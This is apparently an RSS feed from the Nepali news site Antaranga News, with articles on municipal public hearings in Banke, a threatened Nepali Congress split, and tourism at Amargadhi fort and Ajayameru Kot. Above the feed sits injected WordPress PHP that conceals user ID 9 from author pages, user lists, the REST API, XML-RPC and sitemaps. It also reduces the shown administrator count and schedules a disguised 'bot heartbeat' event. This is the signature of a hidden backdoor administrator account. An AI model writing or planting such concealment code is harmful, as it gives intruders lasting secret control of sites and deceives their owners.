add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
सुदुर पश्चिम प्रदेश – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
News from Gandaki ProvinceSat, 18 Jul 2026 03:03:15 +0000en-US
hourly
1 https://wordpress.org/?v=7.0.2https://www.antaranganews.com/wp-content/uploads/2023/05/Ant-logo-150x95.jpgसुदुर पश्चिम प्रदेश – Antaranga News || अन्तरङ्ग न्युज
https://www.antaranganews.com
3232खजुरा गाउँपालिकाको सार्वजनिक सुनुवाईमा नागरिकका प्रश्नै प्रश्न
https://www.antaranganews.com/?p=50110
https://www.antaranganews.com/?p=50110#respondSat, 18 Jul 2026 02:44:16 +0000https://www.antaranganews.com/?p=50110खजुरा(बाँके)– खजुरा गाउँपालिकाकाको आ.व. २०८२/८३ को तेश्रो चौमासिक सार्वजनिक सुनुवाई कार्यक्रममा नागरिक तथा सरोकारवालाहरूले प्रश्नहरूको भारी वर्षा गराए । पालिकाबासी तथा सरोकारवालाहरूको भारी प्रश्नका बीच जवाफदेही वक्ता र सहभागीहरू बिचको लामो प्रश्नोत्तर पश्चात ९ बुँदे साझा सार्वजनिक प्रतिबद्धता असार ३१ गते घोषणा गरिएको हो ।
खजुरा गाउँपालिकाको आयोजना तथा बास नेपालको सहजिकरणमा लामो प्रश्नोत्तर पश्चात उक्त ९ बुँदे साझा सार्वजनिक प्रतिबद्धता घोषणा गरिएको हो । सहभागीहरूका प्रश्नहरूको गाउँपालिका अध्यक्ष डम्बर बि.क., उपाध्यक्ष मञ्जु मल्ल, वडा अध्यक्षहरू र सम्बद्ध शाखाका प्रमुखहरूले जवाफ दिएका थिए ।
सो अवसरमा सहभागीहरूले सार्वजनिक सुनुवाई लगायत पालिकाले सञ्चालन गर्ने सार्वजनिक सरोकारका कार्यक्रममा अधिकांश जनप्रतिनिधिहरू उपस्थित नहुने गरेको, खजुरा गाउँपालिकाका विभिन्न विद्यालयमा सुरक्षित खानेपानीको समस्या रहेको, विद्यालयहरूको शैक्षिक गुणस्तर अपेक्षाअनुसार सुधार हुन नसकेको भन्दै शिक्षाको गुणस्तर अभिवृद्धिका लागि ठोस कार्यक्रम सञ्चालन गर्नुपर्ने, कतिपय विद्यालयमा विद्यार्थीको संख्या अनुसार पर्याप्त फर्निचर नभएकाले पठनपाठन प्रभावित भएको, विद्यालयहरूमा अतिरिक्त क्रियाकलाप सञ्चालनका लागि आवश्यक बजेट तथा सामग्रीको अभाव रहेको विषयमा निकै जोडदार प्रश्न उठेका थिए ।
त्यस्तै, युवाहरूमा लागूऔषध दुव्र्यसन बढ्दै गएको भन्दै यसको नियन्त्रण तथा सचेतनामूलक अभियान सञ्चालन गर्न पालिकाले विशेष पहल गर्नुपर्ने माग गरेका थिए । साथै, सार्वजनिक सडक अतिक्रमणका कारण आवतजावतमा समस्या भएको, जलवायु परिवर्तन, प्लाष्टिकजन्य फोहोर तथा वातावरणीय प्रदूषण बढ्दै गएको, फोहोरमैला व्यवस्थापन प्रभावकारी नभएको, नियमित संकलन तथा व्यवस्थापनमा समस्या रहेको, वडा नं. २ स्थित बावाधाममा शौचालयको अभावका कारण त्यहाँ आउने भक्तजनहरूलाई समस्या भएको, पालिकाले सञ्चालन गर्ने सीपमूलक तालिमहरू प्रभावकारी हुन नसकेको, तालिमपछि सहभागीहरूलाई रोजगारी वा स्वरोजगारसँग जोड्न नसकिएकोलगायतका प्रश्न तथा गुनासो राखेका थिए ।
त्यसैगरी, केही विद्यालयहरूले कानुन विपरीत विभिन्न शीर्षकमा शुल्क लिने गरेको गुनासो गर्दै त्यस्ता विद्यालयमाथि पालिकाले के कारबाही गर्नुपर्ने, जनता माध्यमिक विद्यालय नजिक रहेको अव्यवस्थित विद्युत् पोल र तारका कारण दुर्घटनाको जोखिम रहेको भन्दै शीघ्र व्यवस्थापन गर्नुपर्ने सुझाव दिइएको थियो । यसैगरी, पालिका क्षेत्रमा ट्राफिक व्यवस्थापन कमजोर रहेको, सवारी दुर्घटनाको जोखिम बढेको भन्दै प्रभावकारी ट्राफिक व्यवस्थापन गर्न सहभागीहरूले सुझाएका थिए ।
यसरी घोषणा गरिएका प्रतिबद्धताहरूमा सार्वजनिक सुनुवाई लगायत सार्वजनिक सरोकारका कार्यक्रम सबै जनप्रतिनिधिहरूको उपस्थिति नभएको विषयमा व्यापक गुनासो आएको थियो । सो विषयमा कार्यपालिकामा छलफल गरी कार्यक्रममा उपस्थित हुन निर्देशन दिने, खजुरा गाउँपालिकाका विभिन्न विद्यालयमा खानेपानी समस्या रहेकाले समस्या समाधानका लागि, पहल गर्ने, फर्निचरको अभाव भएका विद्यालयमा फर्निचरको व्यवस्था गर्ने, विद्यालयहरूमा अतिरिक्त क्रियाकलाप सञ्चालनका लागि पालिकाबाट सहयोग गर्ने, वडा नं. २ को बावाधाममा शौचालय निर्माणका लागि गाउँपालिकाबाट सहयोग गर्ने र पालिकाले सञ्चालन गर्ने सीपमुलक तालिमहरूको प्रभावकारीता अभिबृद्धी, सीपमुलक तालिमका सहभागीहरूलाई व्यवसायमा संलग्न गराउने गरी आवश्यक पहल गर्ने रहेका छन् ।
प्रतिबद्धता घोषणामा पालिका अन्तर्गत सार्वजनिक सडकहरूको अतिक्रमण हटाउन आवश्यक पहल गर्ने र शिक्षाको गुर्णस्तरिता अभिबृद्धी गर्न आ–आफ्नो तर्फबाट पहल गर्ने, जलवायु परिवर्तन न्यूनीकरण, अनुकूलनका साथै प्लाष्टिकको प्रयोगलाई निरुत्साहित गर्न आवश्यक नीति, नियम तर्जुमा गरी कार्यान्वयन गर्ने, फोहोरमैला व्यवस्थापनका लागि आवश्यक पहल गर्ने उल्लेख छ । त्यस्तै, शिक्षा सम्बन्धीत ऐन, कानुन विपरित कुनैपनि विद्यालयले विद्यार्थीबाट शुल्क लिएको पाईएमा वा गुनासो प्राप्त भएमा आवश्यक कार्वाही गर्ने, जनता मा.वि. नजिकैको सडकमा रहेको विजुलीको पोलका तारहरू साउन ५ भित्र व्यवस्थित गर्ने, पालिका क्षेत्रको ट्राफिक व्यवस्थापनका लागि आवश्यक कदम चाल्ने, लागु औषध दुर्व्यसन बिरुद्ध सचेतनामुलक अभियान सञ्चालन गर्ने प्रतिबद्धता व्यक्त गरिएको छ ।
बास नेपालका केन्द्रीय अध्यक्ष शिव कुमार वर्माले स्वागत तथा कार्यक्रमको उद्धेश्य माथि प्रकाश पार्नु भएको सो कार्यक्रममा बास नेपालका कार्यक्रम अधिकृत रबिन्द्र बोहराले सञ्चालन गर्नु भएको थियो भने जनसम्पर्क अधिकृत माधव कार्कीले नागरिक प्रतिबेदन पत्र र बर्हिगमन अभिमतको नतिजा घोषणा गर्नु भएको थियो । पालिकाका प्रमुख प्रशासकीय अधिकृत दिलबहादुर पौडेललले पालिकाद्वारा वर्षभर सम्पन्न गरेका योजना क्रियाकलापहरूको प्रगति प्रतिवेदन प्रस्तुत गर्नु भएको थियो । माधव कार्कीको सहयोगमा ।
]]>
https://www.antaranganews.com/?feed=rss2&p=501100बाँकेमा डुडुवा गाँउपालिकाको सार्बजनिक सुनुवाईमा पाँच बुद्धे साझा सार्बजनिक प्रतिबद्धता व्यक्त
https://www.antaranganews.com/?p=50081
https://www.antaranganews.com/?p=50081#respondThu, 16 Jul 2026 03:46:30 +0000https://www.antaranganews.com/?p=50081नेपालगञ्ज– बाँकेको डुडुवा गाँउपालिकाको सार्बजनिक सुनुवाईमा ५ बुद्धे साझा सार्बजनिक प्रतिबद्धता व्यक्त भएको छ । डुडुवा गाँउपालिकाको आयोजना तथा बास नेपालको सहजीकरणमा सोही गाउँपालिकाको सभाहलमा आयोजित सार्बजनिक सुनुवाई कार्यक्रमबाट ५ बुद्धे साझा सार्बजनिक प्रतिबद्धता असार ३१ गते व्यक्त गर्दै सम्पन्न भएको हो ।
उक्त अवसरमा सार्बजनिक साझा प्रतिबद्धताहरूमा, डुडुवा गाँउपालिका– ५ को बाटो अधुरो रहेकाले सो बाटो आउँदो आर्थिक बर्षमा निर्माण गर्ने, आवागमनका लागि बाटो सहज बनाउन ग्राभेलको कार्य तत्काल गर्ने, डुडुवा गाँउपालिका– ६ को हिरमिनियाको मुनासिपुरको सडकमा आउँदो आर्थिक बर्षमा ग्राभेल गर्ने, गाँउपालिकाको सेवा सुबिधा र विकास निर्माणको गुणस्तरीयता थप अभिबृद्धि गर्ने, बिगतमा पालिकामा भएको आगजनीका बिषयमा छानबिन गर्ने, पालिकासँग सम्बन्धित सार्बजनिक सूचना प्रक्रियागत रुपमा माग भएमा आम नागरिकलाई सूचना उपलब्ध गराउनेलगायतका रहेका छन् ।
उक्त सार्बजनिक सुनुवाईको खुला छलफलमा सुकुम्बासी समस्या, पालिका भित्रको खानेपानी योजनाको अलपत्रता, पालिका भित्रका सडक ग्राभेल गर्नुपर्ने, वडा नम्बर ५ को स्वास्थ्य चौकीमा ल्याव कर्मचारीको समस्या समाधानको उपाय खोज्ने, पालिकाहरूबाट प्रवाह हुने सूचनाहरू नागरिकहरू सामु नपुग्ने गरेको र वडा नम्बर १ को हिरमिनियाको खडैचा टोलको सडकको अबस्था लगायतका विषयहरूमा कार्यक्रमका सहभागीहरूले प्रश्नहरू प्रमुख रुपमा उठाएका थिए । सार्बजनिक सुनुवाईमा २५० बढी सरोकारवालाहरूको उपस्थिति रहेको थियो ।
खुला छलफलमा तीन घण्टासम्म चलेको थियो । सो समयमा उठेका प्रश्नहरूको जवाफ कार्यक्रमका प्रमुख सरोकारवाला व्यक्ति पालिका अध्यक्ष नरेन्द्र कुमार चौधरीले दिनु भएको थियो ।
बास नेपालका केन्द्रीय अध्यक्ष शिव कुमार बर्माले सार्बजनिक सुनुवाई कार्यक्रमको सञ्चालन गर्नु भएको थियो । बास नेपालका कार्यकारी निर्देशक नमस्कार शाहले स्वागत मन्तव्य व्यक्त गर्नुका साथै कार्यक्रमको उद्धेश्यमा प्रकाश पार्नु भएको थियो ।
सार्बजनिक सुनुवाईलाई सुशासनको मुख्य कडीहरूमध्ये एक मानिन्छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=500810कांग्रेस विभाजनको संघारमा : औपचारीक घोषणाको प्रतिक्षा
https://www.antaranganews.com/?p=49899
https://www.antaranganews.com/?p=49899#respondTue, 07 Jul 2026 14:46:45 +0000https://www.antaranganews.com/?p=49899काठमाडौं– नेपाली कांग्रेस विभाजनको अन्तिम संघारमा उभिएको छ । असार २२ गते संस्थापन इतर पक्षले यहाँ स्थित चुनदेवीमा सम्पर्क कार्यालय उद्घाटन गरेसँगै औपचारीक विभाजनको प्रतिक्षा गरिएको छ । अब बन्ने नयाँ दलको नाम राष्ट्रिय कांग्रेस राख्ने र चुनाव चिन्ह शंख राख्ने भन्ने सम्मको स्थिती असार २३ गते बाहिरिएको छ ।
पार्टीको संस्थापन इतर समूहका नेता–कार्यकर्ताले शीर्ष नेतृत्वलाई निर्णायक कदम चाल्न दबाब दिएका छन् । इतर समुहले काठमाडौंको चुनदेवीमा स्थापित सम्पर्क कार्यालयमा बसेको बैठकमा सहभागी प्रदेश सभापति, पूर्वकेन्द्रीय सदस्य, पालिका सभापतिलगायत नेताहरूले अब पार्टी विभाजनको विषयमा खुट्टा नकमाई अघि बढ्न नेतृत्वलाई दबाब दिएका हुन् । उनीहरूले पार्टी फुटाउन नसक्ने अवस्था आए चुप लागेर बस्नुभन्दा ‘चन्दन घसेर बस्न’ समेत भनेका थिए ।
संस्थापन पक्षले सिनियर नेताहरूको क्रियाशील सदस्यता अध्यावधिक गर्न अनुमति माग्ने तयारी गरेको बताएको छ । क्रियाशील सदस्यता व्यवस्थापन समितिका संयोजक तथा महामन्त्री प्रदीप पौडेलले आफूहरूभन्दा सिनियर नेताहरूको सदस्यता ‘डिजिटल्ली अध्यावधिक’ गर्न अनुमति मागिने जानकारी दिनुभयो । उहाँका अनुसार पार्टीका लागि लामो समय योगदान दिएका नेताहरूको सदस्यता अध्यावधिक गर्न अनुमति लिएपछि संस्थापन पक्षले नै प्रक्रिया पूरा गरिदिनेछ । अनुमति माग्न महामन्त्री पौडेल आफैं ती नेताहरूलाई भेट्ने तयारीमा हुनुहुन्छ । संस्थापन पक्षले पछिल्लो पटक साउन ३ गतेसम्म अनुमति लिएर सदस्यता अध्यावधिक गर्ने योजना अघि सारेको जनाएको छ । सो अवधिसम्म पनि अद्यावधिक नभए त्यस्ता नेताहरूलाई विधानले नचिन्ने चेतावनीसमेत त्यो पक्षले दिएको छ ।
पार्टी सदस्यता अध्यावधिक गर्नुपर्ने नेताहरूमा पूर्णबहादुर खड्का, डा. शेखर कोइराला, विमलेन्द्र निधि, विजयकुमार गच्छदार, डा. शशांक कोइराला, कृष्णप्रसाद सिटौला र डा. प्रकाशशरण महत लगायत हुनुहुन्छ । संस्थापन पक्षका अनुसार करिब २५ हजार क्रियाशील सदस्यहरूले मात्रै सदस्यता नविकरण गर्न बाँकी रहेको बताएको छ । इतर समूहले भने त्यो भनाइलाई ठाडै इन्कार गरेका छन् ।
हाल कांग्रेसभित्र १४औँ महाधिवेशनका प्रतिनिधिको मान्यता, केन्द्रीय सदस्यहरूको समायोजन तथा सदस्यता अध्यावधिक जस्ता विषयहरूमा विवाद रहेकाे छ । विशेष महाधिवेशनपछि चुलिएको यो विवाद अझै समाधान हुन सकेको छैन ।
पार्टीमा विभाजनको दबाब बढिरहेको बेला संस्थापन पक्ष सदस्यता प्रक्रियाबाट संगठनलाई नियन्त्रणमा राख्न उद्दत रहेको देखिन्छ भने इतर पक्ष त्यो स्थितीलाई स्वीकार गर्न तयार देखिदैन ।
इतर समूहले विशेष महाधिवेशनबाट आएको नेतृत्व र निर्णयहरूलाइ अस्वीकार गर्दै आएको छ भने संस्थापन पक्षले नयाँ प्रक्रियाबाट सदस्यता अद्यावधिक अनिवार्य भएको दावी गर्दै आएको छ ।
विशेष महाधिवेशन पचाउन नसकेका पक्षले अर्को पार्टी खोल्ने निर्णयमा पुग्ने अन्तिम चरण बाँकी रहेको छ । १४ औं महाधिवेशनबाट सभापति लगायतका पदाधिकारी तथा केन्द्रीय सदस्यहरू बनेका साथै विभिन्न तहको जिम्मेवारीमा रहेकाहरूलाई पार्टीको नयाँ परिस्थिती स्वीकार्न कठिन भएको बताइन्छ ।
इतर समुहको बैठकमा नयाँ पार्टी खोल्नु पर्ने भन्दै नेताहरूलाई दबाव मुलक धारणा राख्नेहरूमा पूर्वकेन्द्रीय सदस्य शिव हुमागाईं, पूर्वकेन्द्रीय सदस्य गुरु बराल, सुदूरपश्चिम प्रदेश सभापति वीरबहादुर बलायर, कुन्दन काफ्ले, महेन्द्र सुब्बा लगायत हुनुहुन्छ ।
सो सम्बन्धमा नेता विमलेन्द्र निधिले भन्नुभयो, ‘विशेष महाधिवेशनबाटै पार्टी विभाजन भइसकेको हो, शेखरजीले २५ गतेसम्मको समय दिनुभएको छ, मिलाउने हो भने मिलाउनुस्, नभए अलग–अलग हुन्छ ।’ निधिले फुटिसकेको पार्टीलाई इतर समूहले मिलाउने प्रयास गरिरहेको उल्लेख गर्नुभयो । उहाँले थप भन्नुभयो ‘निर्वाचन आयोग र अदालतले पनि कांग्रेस फुटाइसकेका छन् ।’
इतर समूहको बैठक असार २४ गते पुनः बस्ने भएको छ । इतर समुहको कार्यालय उद्घाटन र बैठकमा डा. शेखर कोइराला अनुपस्थित भएकोप्रति समेत बैठकमा टिप्पणी गरिएको बताइएको छ ।
]]>https://www.antaranganews.com/?feed=rss2&p=498990सुुदूरपश्चिम : अमरगढी पर्यटन र अजयमेरु कोट
https://www.antaranganews.com/?p=49855
https://www.antaranganews.com/?p=49855#respondSat, 04 Jul 2026 13:58:21 +0000https://www.antaranganews.com/?p=49855 पर्यटन प्रकृति, संस्कृति र हिमश्रृखलाको रमणीयतामा मात्र सीमित छैन । पर्यटनको क्षेत्रमा इतिहासको खोज र अनुसन्धानमा रमाउने पर्यटकहरूको रुचि पनि हुन्छ । इतिहास भनेको बितिसकेका सत्य घटनाहरूको यथार्थ विवरण हो, त्यसैले पर्यटनका लागि इतिहास सधैं खोजिरहनु पर्ने विषय बन्छ । तर सबै इतिहास देखिने हुँदैन । इतिहासका धेरै पाटा अदृश्य छन, धेरै ठाउँमा पुरातात्विक सम्पदाका कथा लुकेर बसेका छन । पर्यटन मूलतः अनुभूति र रोचकता सँग जोडिएको हुन्छ । यी अनुभूतिहरू समयसँगै पुराना हुँदैनन् । पर्यटनले इतिहासलाई वर्तमानसँग जोडछ । त्यसैले इतिहासका कुरा पनि वर्तमानका अवसर र भविष्यका सम्भावना बन्छन ।
पर्यटनको क्षेत्र शताब्दीऔँ पुराना भए पनि हरेक पुस्ताले नयाँ अनुभवका रुपमा लिने गर्दछन । पर्यटन केवल प्राकृतिक सौन्दर्यमा सीमित हुँदैन । ऐतिहासिक स्थलले पनि पर्यटकहरूलाई आकर्षण गर्दछ । पर्यटक जब कुनै ऐतिहासिक ठाउँमा पुग्दछ उसको लागि नयाँ अनुभव हुन्छ । पर्यटकहरूलाई नयाँ ठाउँका ऐतिहासिक र पुरातात्विक स्थल, धार्मिक सांस्कृतिक परम्परा र स्थानीय खानपानले आकर्षित गर्दछ । इतिहासमा रुचि राख्ने पर्यटकहरूलाई सुदूुरपश्चिममा डडेलधुराको अजयमेरु कोट र अमरगढीले जीवन्त इतिहास र पुरातत्व नियाल्ने दुर्लभ अवसर दिन्छ । पर्यटनको लागि डडेलधुरामा धेरै नलेखिएका इतिहास छन । डडेलधुराको नाम भूबनोटको आकारबाट राखिएको छ । स्थानीय बोलीमा ढाडलाई डडाल्नु र अग्लो ठाउँलाई धुरा भनिने हुँदा डडाल्नु जस्तो धुरा भन्दाभन्दै डडेलधुरा भएको हो । अर्कोतर्फ प्राकृतिक रुपमा दलिनजस्तो डाँडाले डडेलधुरा नाम दिएको छ । पहिले डडेलधुरालाई वागखोडा अर्थात बाघ गुफा, तल्लो खलंगा, मल्लो खलंगा र श्वार खलंगा भनिन्थ्यो । डडेलधुरा घुम्न जाँदा पर्यटकहरूले इतिहास, तीर्थाटन अथवा प्रकृति सम्पदा केलाई प्राथमिकता दिने भन्ने प्याकेज बनाउँदा यात्रा सहज र खर्च कम हुन्छ । इतिहासमा रुचि भएका पर्यटकले सदरमुकामको अमरगढी किल्ला र अजयमेरु कोट पुग्नै पर्ने हुन्छ । अर्कोतर्फ प्रकृति मेमी पर्यटकहरूले आलीताल, चिपुर र भद्रपुर देवल, साइल झरना, कुयलगाड झरना, लालीगुराँसको जंगल पुग्न सके राम्रो हुन्छ ।
कैलालीको अत्तरिया चोकबाट डडेलधुरा जाँदा भासु भिरको नाम प्रायः सबैले सुनेका हुन्छन । तर, धेरैजसो यात्रुहरू यहाँ रोकिएर हेर्न नै डराउँछन । नयाँ पर्यटकहरूका लागि भासु भिर आयो भन्ने सुन्नासाथ मनमा डर र कौतूहल एकैपटक पलाउँछ । गोदावरी धामबाट करिब २५ किलोमिटरको नागबेली उकालो पार गरेपछि खानीडाँडा हुँदै पुगिने ठाडो पहरोलाई भासु भिर भनिन्छ । पहिले पहिले मालबाहक ट्रकका चालकहरू भिरको फेदीमा रहेको भासु माताको थानमा धूप बालेर मात्र उकालो लाग्थे । भासु भिरको बीचबाटै राजमार्ग गएको छ । दायाँतिर ठाडो पहरो छ, बायाँतिर गहिरो खोँच, सडक साँघुरो छ, घुम्ती धेरै छन । त्यसैले धेरै पर्यटक भासु भिरलाई साहसिक यात्रा मान्छन । डरलाग्दो भए पनि यहींबाट तल तराईका फराकिला फाँट र माथि चुरेको हरियो काख एकै फ्रेममा पर्यटकहरूले देख्दछन । बिहानको कुहिरोमा भासु भिरले देखाउने नाटकीय दृश्य खिच्न फोटोग्राफर पर्यटकहरूले विशेष रुचि देखाउछन । गोदावरीबाट करिब २५ किलोमिटरमा खानीडाँडा पुगिन्छ, त्यहाँबाट करिब ५ किलोमिटर उत्तर लागेपछि भासु भिर आइपुग्छ । सामान्य बोलचालमा खानीडाँडाको उकालो सुरु भएदेखि सहजपुर नजिकसम्मको करिब चार पाँच किलोमिटर लामो घुम्ती र भिरैभिरको खण्डलाई नै भासु भिर क्षेत्र भन्ने चलन छ ।
डडेलधुरा पुग्ने पर्यटक इतिहासमा चासो राख्छन । विशेषगरी किसान नेता भीमदत्त पन्तबारेमा जान्न खोज्दछन । वि.सं.१९८३ मंसिर १० मा अमरगढीको कारीगाउँमा जन्मिएका पन्तको २०१० सालमा डोटी–डडेलधुरा सीमाको बुडर गल्लेकमा हत्या भएको थियो । बडाहाकिम मोहनसिंहको आदेशमा लालबहादुर थापा नेतृत्वको टोलीले खाना खाँदै गरेका बेला गोली हानी टाउको काटेर खलंगाको भैरव मन्दिरनजिक बाँसको बोटमा झुन्डयाएको थियो । यो निर्मम घटना सुन्दा पर्यटकहरू क्षणभर भावविह्वल हुन्छन । डडेलधुरामा इतिहासमा रुचि राख्ने र प्रकृतिसंग रमाउने पर्यटकहरू पुग्ने गर्दछन । डडेलधुरामा मूर्त अमूर्त सांस्कृतिक सम्पदा, संस्कार एवं परम्परागत रहनसहन, इतिहासमा रुचि भएका र शोधपत्र तयार गर्ने पर्यटकहरू डडेलधुरा पुग्दछन । डडेलधुराको सांस्कृतिक सम्पदा, संस्कार र परम्परागत शाश्वत मूल्य मान्यताहरु अन्य जिल्लाबाट गएका पर्यटकहरूका लागि नौलो मानिन्छ । पर्यटनको क्षेत्रमा केहि पुर्वाधारको विकास र सुविधाजनक होटलको व्यवस्था हुन थालेपछि डडेलधुरामा आजभोलि वाह्य पर्यटकहरू पनि पुग्ने गर्दछन । विशेष गरेर चाडपर्वका बेला धार्मिक, सांस्कृतिक गतिविधि हुने हुनाले त्यसबेला पर्यटकहरू अन्य समय भन्दा बढी जाने गर्दछन ।
डडेलधुरा आफैमा प्राकृतिक सुन्दरता भएको भूगोल हो । तराइ अथवा भारतबाट घुम्नको लागि डडेलधुरा पुग्ने पर्यटकहरू प्राकृतिक सुन्दरतादेखि रमाउने गर्दछन । डडेलधुरा जिल्ला अपी हिमाल, बडीमालिका, बैजनाथ धाम जस्ता सुदूरपश्चिमको प्रसिद्ध पर्यटकीय स्थलहरू अवलोकन गर्न जाने प्रमुख द्वार पनि हो । प्रकृतिले सजिएको डडेलधुरा हिमाली जिल्ला त होइन तर डडेलधुराको विभिन्न उच्च पहाडी स्थानबाट दार्चुलाको अपि हिमाल र बझाङमा पर्ने साइपाल हिमाल अवलोकन गर्न सकिन्छ । डडेलधुराको यात्रामा पर्यटकहरूलाई खानाबस्नको लागि कुनै असुबिधा हुदैन । पर्यटकहरूले यात्रामा बुडरमा जोराइली चामलको दाल–भात, स्याउलेमा सेलरोटी–अचार, साहुखर्कमा खिर, पल्टुडेमा ठूलीगाडको माच्छा र डडेलधुरामा गौतामे डुप्का र लोकल कुखुराको झोलको स्वाद लिन पाउने छन । डडेलधुराको अमरगढी किल्ला ऐतिहासिक किल्ला हो । डडेलधुरा पुगेपछि अमरगढी किल्लाको अवलोकन नगरे पर्यटकहरूको यात्रानै अधुरो हुन्छ ।
डडेलधुरामा पर्यटकहरू पहिला अमरगढी किल्लामा पुग्दछन । अमरगढी किल्ला प्राकृतिक भ्युटावर हो । जहाँबाट डडेलधुरा बजार वरपरका धेरै भूभाग अवलोकन गर्न सकिन्छ । अमरगढी किल्लाको निर्माण श्री ५ रणबहादुर शाहको शासन काल तथा राजकुमार बहादुर शाहको नायवीमा सञ्चालित नेपाल एकीकरणको क्रममा बि.सं.१८४७ मा डोटेली सैनिकसंग गोर्खाली सैनिकको युद्ध भयो । युद्धमा डोटेली फौज पराजित भइसकेपछि डोटी राज्य पनि बिशाल नेपाल अधिराज्यमा गाभिन पुग्यो । युद्वकालीन समयमा भूगोल र सुशानलाई सुदृढ र विस्तार गर्न अमरसिंह थापा प्रथम प्रशासनको रुपमा नियुक्ति भए । उनले यस क्षेत्रको संरक्षण र महाकाली पारी पनि विजय अभियानलाई जारी राख्न अमरगढी किल्लाको निर्माण गरेका हुन । अमरगढीलाई आधार मानी उनले अल्मोडा, गढवाल र काँगडासम्म राज्य विस्तार गरेका थिए । विजय अभियानको समाप्तिपछि अमरगढीको मातहतमा रहने गरी एउटा किल्ला कुमाउमा पनि राखिएको थियो । अमरसिंह थापाद्वारा निर्माण गरिएको किल्ला कलात्मक र चारै तिर ढुङगाले निर्माण भएको छ । किल्लाभित्र तोप, बन्दुक, घरेलु भाला, गोलालगायतका हातहतिया थिए । तर ती युद्ध सामग्रीहरू पर्यटकहरूले अहिले देख्न सक्दैनन । किल्ला भित्र गुफाहरू पनि बनाइएको छ । आजभोलि किल्ला माथि रुख विरुवाले रमणीय वातावरण बनाइ दिएको छ । ऐतिहासिक किल्लाका विच भागमा उग्रभैरवको मन्दिर पनि छ । धार्मिक र सामरिक महत्व भएकोले पर्यटकहरूलाई इतिहासको छुट्टै अनुभुति हुने गर्दछ ।
अमरगढी किल्ला पछि धेरै पर्यटकहरू अजयमेरू कोट पुग्दछन । अजयमेरु कोट डडेलधुरा बजारदेखि करिब ७ किलोमिटर पश्चिम, अजयमेरु गाउँपालिकाको हाटगाउँ र गाड खोलाको बीचमा पर्दछ । सुदूरपश्चिमकै गौरवशाली पुरातात्विक सम्पदा हो अजयमेरु कोट । संस्कृतको अजेयु र मेरु मिलेर बनेको अजयमेरु कोट जित्न नसकिन किल्ला हो । १२ औं १३ औं शताब्दीतिर शक्तिशाली डोटी राज्य उदाएपछि डोटेली मल्ल राजाहरूले अजयमेरुलाई मुख्य प्रशासनिक केन्द्र र शीतकालीन राजधानी बनाएका थिए । अजयमेरु कोटमा वि.सं.१४१९ सम्म कत्युरी पाल वंशको क्षेत्रीय दरबार थियो । त्यसपछि बि.सं.१४४१ मा रैका राजा नागी मल्लले कब्जा गरेपछि अजयमेरु कोटलाई नागीकोट र हाँटकोट पनि भन्न थालियो । जुनकुरा राजा निरयपालदेवका ताम्रपत्र र शिलालेखमा पाइन्छ । प्रकृतिले बनाएको रणनीतिक किल्ला अर्थात अजयमेरु कोट तीनैतिर भीर र गाड खोलाले घेरिएको अग्लो टुप्पोमा रहेको छ । अजयमेरुकोटमा प्राचीन दरबारको भग्नावशेष, नाउला, देवल, वीरखम्ब, कलात्मक सिलिङ, राजाको बैठकस्थलसहितका ऐतिहासिक वस्तु छरिएर रहेका छन ।
